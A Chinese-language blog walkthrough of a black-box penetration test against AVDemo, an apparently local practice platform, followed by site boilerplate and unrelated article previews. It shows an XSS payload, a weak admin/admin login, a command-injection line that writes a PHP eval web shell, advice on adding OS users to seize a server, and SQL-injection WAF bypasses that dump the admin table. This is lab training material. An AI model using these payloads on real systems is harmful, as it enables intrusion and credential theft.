AVDemo漏洞平台黑盒测试

信息收集


说明一下:
因为是本地的环境,端口这些就不扫描了,

还有这个是某个dalao写的平台,也就检测不到什么cms了,

信息收集,端口,cms这些是必做的,

首先,这里先简单的使用轻量级扫描器扫描一下看看

images


可以看到扫描到了用户注册、用户登录、管理员登录等等,

还有一些302重定向,说明存在admin这个目录 ,

还有一些403无权限访问,也说明网站存在这些目录。


前台XSS

前台搜索留言处存在XSS ,

payload:

<script>alert(/xss/)</script>

images


管理员弱口令

管理员后台:www.xx.com/admin/login

简单测试 admin   admin 然后就进去了


后台命令执行

发现了一个奇怪的页面 ,

跟DVWA的很像有木有,可以执行命令

images


如果在渗透测试中,我们可以尝试使用 net user 命令来添加用户,

Linux下可以使用 useradd ,

要是对方开了远程桌面,添加用户直接就拿服务器了,

这里我就不测试了,我们来写shell看看 ,

命令:

127.0.0.1 && echo ^<?php eval($_POST[cmd]);?^> > D:/phpStudy/PHPTutorial/WWW/VAuditDemo/shell.php

知道网站路径的话可以写在那个目录都行,不过也得看看有没有访问权限,

然后直接上菜刀

images


然后菜刀上也经常使用虚拟终端来执行一些命令.

补充: 如果使用 dir 命令来指定某个路径查看文件,需要使用反斜杠


前台头像上传

注册一个test的账号,

然后在头像上传处,我们先拿一张普通的jpg文件测试一下,

发现没有返回什么路径之类的,审查元素也没发现什么路径。

images


然后传一个 shell.php 文件,发现被拦截了,

images


试了几个方法还是不行,然后看了处理上传的代码,

没有返回路径,文件名也挺复杂的,

条件限制没有什么好的方法,暂时先放弃了,

一般来说上传的文件一般在upload目录下,这个正好也在这个目录,但是文件名挺复杂了,

就先这样吧!!


前台sql注入

前台留言处发现通过id去搜索留言详情,

images


那么会不会存在注入,来测试一下

首先一个单引号,发现报错了,

images


输入 and 1=1 ,发现报错有一个 sqlwaf的词,判断存在waf,

应该是吃掉了一些关键字,那么 select ,union 等常见的关键字应该也不能直接用了,

images


既然 and 被吃了,那来试试 || ,

发现被替换成了空白符,

images


来试试大小写,发现也过滤了

images


来试试 /**/ 编码,发现报错了,

感情是被实体化了,

images


再来试试URL编码 %252f%252a 就是 /**/ 的意思,

发现 %百分号被斜杠转义了,

images


经过多次尝试后,回到上面 || 被替换成空,那么会不会有机会呢,

果然是可以的,但是超过列数了,

images


来逐渐删减一下,最后 4 的时候成功爆出显位,

images


然后来爆一下数据库,

images


然后想查一下表,发现_ 下划线被转换了,这个貌似没有什么好的绕过方法,

images


然后只能试试盲猜了,数据库一般都有 adminusers表,

发现 adminusers表都存在,但是 users表一般是存在普通用户的,所有我们直接看admin表,

没有报错说明存在

images


然后再去查爆字段,发现连id这个字段都没有????

最后无奈只能上数据库去查看,发现id这个字段其实是叫admin_id

下划线是无法绕的,只能用其他方法,

这里可以使用 *星号,星号在数据库是代表所有的意思,

但是这里必须要相同数量的字段才能查询,不然会报错,

而 admin这个表字段刚好是三个,然后就直接爆出数据了,

images


附1:常见状态码

  1. 200   OK   请求成功。一般用于GET与POST请求
  2. 301   Moved Permanently   被请求的资源已永久移动到新位置
  3. 302   Found   临时移动。与301类似。但请求的资源现在临时从不同的 URL 响应请求。
  4. 401   Unauthorized   当前请求需要用户验证。
  5. 403   Forbidden   服务器理解请求客户端的请求,但是拒绝执行此请求
  6. 404   Not Found   所请求的资源(网页)不存在或已被删除。
  7. 500   Internal Server Error   服务器内部错误,无法完成请求
  8. 502   Bad Gateway   作为网关或者代理工作的服务器尝试执行请求时,从远程服务器接收到了一个无效的响应
  9. 503   Service Unavailable   由于超载或系统维护,服务器暂时的无法处理客户端的请求。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/632444.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

致命错误: 用户 “system“ Password 认证失败 (kbjdbc: autodetected server-_enco

问题在于用户权限不足&#xff0c;修改kingbase安装目录data目录下的的文件sys_hba.conf&#xff0c;修改IPV4部分本地验证方式为trust即可 修改后&#xff0c;打开资源管理器&#xff0c;通过服务找到人大金仓服务&#xff0c;重新启动即可

有趣的css - 文字隐身术效果

大家好&#xff0c;我是 Just&#xff0c;这里是「设计师工作日常」&#xff0c;今天分享的是利用动画属性来模拟文字隐身消失的效果。 《有趣的css》系列最新实例通过公众号「设计师工作日常」发布。 目录 整体效果核心代码html 代码css 部分代码 完整代码如下html 页面css 样…

ip显示地址和实际地址不一样:原因解析与应对策略

在数字化时代&#xff0c;IP地址作为我们在互联网上的身份标识&#xff0c;其重要性不言而喻。然而&#xff0c;有时我们会遇到ip显示地址和实际地址不一样的情况&#xff0c;这不仅可能影响到我们的网络体验&#xff0c;还可能引发一系列安全和隐私问题。那么&#xff0c;造成…

嵌入式学习72-复习(字符设备驱动框架)

编辑 drivers/char/Kconfig 为了在make menuconfig是能够显示出我们写的驱动程序 make menuconfig 编辑 drivers/char/Makefile 才是真正把编写好的源文件加入到编译中去 make modules cp drivers/char/first_driver.ko ~/nfs/rootfs/

26版SPSS操作教程(高级教程第二十三章)

目录 前言 粉丝及官方意见说明 第二十三章一些学习笔记 第二十三章一些操作方法 时间序列模型 时间序列的建立和平稳化 数据假设 具体操作 定义时间变量 时间序列的平稳化 绘制相应的时间序列图 序列图 自相关图&#xff08;autocorrelation chart&#xff09; 对…

03-行为型模式(共10种)

上一篇: 02-结构型设计模式(共7种) 1. Strategy(策略模式) 策略模式是一种行为型设计模式&#xff0c;它定义了一系列算法&#xff0c;将每个算法封装到独立的类中&#xff0c;并使它们可以互相替换。这样可以使算法的变化独立于使用算法的客户端。 在 C 中&#xff0c;策略模式…

LeetCode-1953. 你可以工作的最大周数【贪心 数组】

LeetCode-1953. 你可以工作的最大周数【贪心 数组】 题目描述&#xff1a;解题思路一&#xff1a;贪心&#xff0c;关键点是找到(工作最长时间的工作longest )与(剩余其他工作加起来的时间总和rest )的关系。解题思路二&#xff1a;证明解题思路三&#xff1a;简化 题目描述&am…

【c++算法篇】滑动窗口

&#x1f525;个人主页&#xff1a;Quitecoder &#x1f525;专栏&#xff1a;算法笔记仓 目录 1.长度最小的子数组2.无重复字符的最长子串3.最大连续1的个数 III4.将 x 减到 0 的最小操作数5.水果成篮6.找到字符串中所有字母异位词7.串联所有单词的子串8.最小覆盖子串 滑动窗…

系统架构师考试(二)

敏捷方法 CMMI代表Capability Maturity Model Integration&#xff0c;是一种用于评估和改进组织软件工程和系统工程的模型。CMMI提供一个框架&#xff0c;帮助组织评估其软件和系统工程的成熟度&#xff0c;该模型基于过程成熟度模型&#xff08;CMM&#xff09;和集成项目管理…

Java 如何去规避一些没用的类型转换?

在Java编程中&#xff0c;类型转换&#xff08;Type Casting&#xff09;是将一个数据类型的值转换为另一个数据类型的过程。这在某些情况下是必要的&#xff0c;但滥用类型转换会导致代码变得复杂、难以维护&#xff0c;并且可能引发运行时错误。规避不必要的类型转换不仅能提…

Online RL + IL : Active Policy Improvement from Multiple Black-box Oracles

ICML 2023 paper code 紧接上一篇MAMBA&#xff0c;本文在同种问题设定下的在线模仿学习方法。 Intro 文章提出了一种新的模仿学习算法&#xff0c;名为 MAPS&#xff08;Max-aggregation Active Policy Selection&#xff09;和其变体 MAPS-SE&#xff08;Max-aggregation A…

Kibana使用

一、什么是Kibana   Kibana 是一个开源的分析和可视化平台&#xff0c;Kibana 提供搜索、查看和与存储在 Elasticsearch 索引中的数据进行交互的功能。开发者或运维人员可以轻松地执行高级数据分析&#xff0c;并在各种图表、表格和地图中可视化数据。 Kibana使用&#xff1a…

【御控物联】物联网协议

文章目录 一、前言二、协议清单三、技术资料 一、前言 如果一个人想要和全球各个国家贸易&#xff0c;那这个人就得懂各个国家的语言或者全球通用语言&#xff0c;同样&#xff0c;在物联网的世界里&#xff0c;各家设备也都拥有自己的语言&#xff08;协议&#xff09;&#…

JUnit5参数化用例(三)

JUnit5枚举参数的参数化&#xff1a; 使用枚举类作为测试数据枚举参数参数化注解EnumSource必须与ParameterizedTest结合使用 枚举参数化注解 -简单使用&#xff1a; 需要添加EnumSource注解测试方法传入枚举类作为参数 在执行前&#xff0c;我们需了解enum枚举的使用方式&…

弘君资本午评:沪指拉升涨0.48%,地产板块爆发,金融等板块上扬

16日早盘&#xff0c;两市股指盘中震动上扬&#xff0c;创业板指涨超1%&#xff1b;场内近3800股飘红&#xff0c;半日成交超5000亿元。 到午间收盘&#xff0c;沪指涨0.48%报3134.97点&#xff0c;深证成指涨0.83%&#xff0c;创业板指涨1.14%&#xff0c;两市算计成交5194亿…

在win10折腾Flowise:部署和尝试

Flowise 是一种低代码/无代码拖放工具&#xff0c;旨在让人们轻松可视化和构建 LLM 应用程序。 本地部署 操作系统&#xff1a; win10 由于网络、操作系统等各种未知问题&#xff0c;使用npm install -g flowise的方式&#xff0c;尝试了很多次&#xff0c;都没有部署成功&am…

AI大模型试用盘点(附体验网址)包含10多款大模型

【前言】目前我是用过的公开免费使用的文心一言、智谱清言比较好! 1、阿里云——通义千问 网址:https://tongyi.aliyun.com/ 简介:阿里达摩院推出的大模型,拥有千亿参数,可用于智能问答、知识检索、文案创作等场景。 演示: 功能大全: 2、科大讯飞——星火大模型…

数据库-索引结构(B-Tree,B+Tree,Hash,二叉树)

文章目录 索引结构有哪些&#xff1f;二叉树详解&#xff1f;B-Tree详解?BTree详解&#xff1f;Hash详解&#xff1f;本篇小结 更多相关内容可查看 索引结构有哪些&#xff1f; MySQL的索引是在存储引擎层实现的&#xff0c;不同的存储引擎有不同的索引结构&#xff0c;主要包…

【C语言】static关键字的妙用

前言 在c/c中存在着一种内存结构&#xff0c;以此为栈区、堆区、静态区&#xff08;这里是大致划分&#xff0c;不细究&#xff09; 存放规则如下&#xff1a; 栈区&#xff1a;存放局部变量、函数的形参、临时属性的变量 堆区&#xff1a;存放malloc、realloc、calloc、fr…

2024 年适用于 Mac 的 5 大最佳免费数据恢复工具

一个常见的误解是&#xff0c;数据恢复总是很昂贵。实际上&#xff0c;您可以在 2024 年下载许多适用于 Mac 的免费数据恢复软件工具&#xff0c;并使用它们来恢复丢失的数据&#xff0c;而无需将 Mac 交给数据恢复专业人员&#xff0c;他们保证会向您收取一小笔费用他们的服务…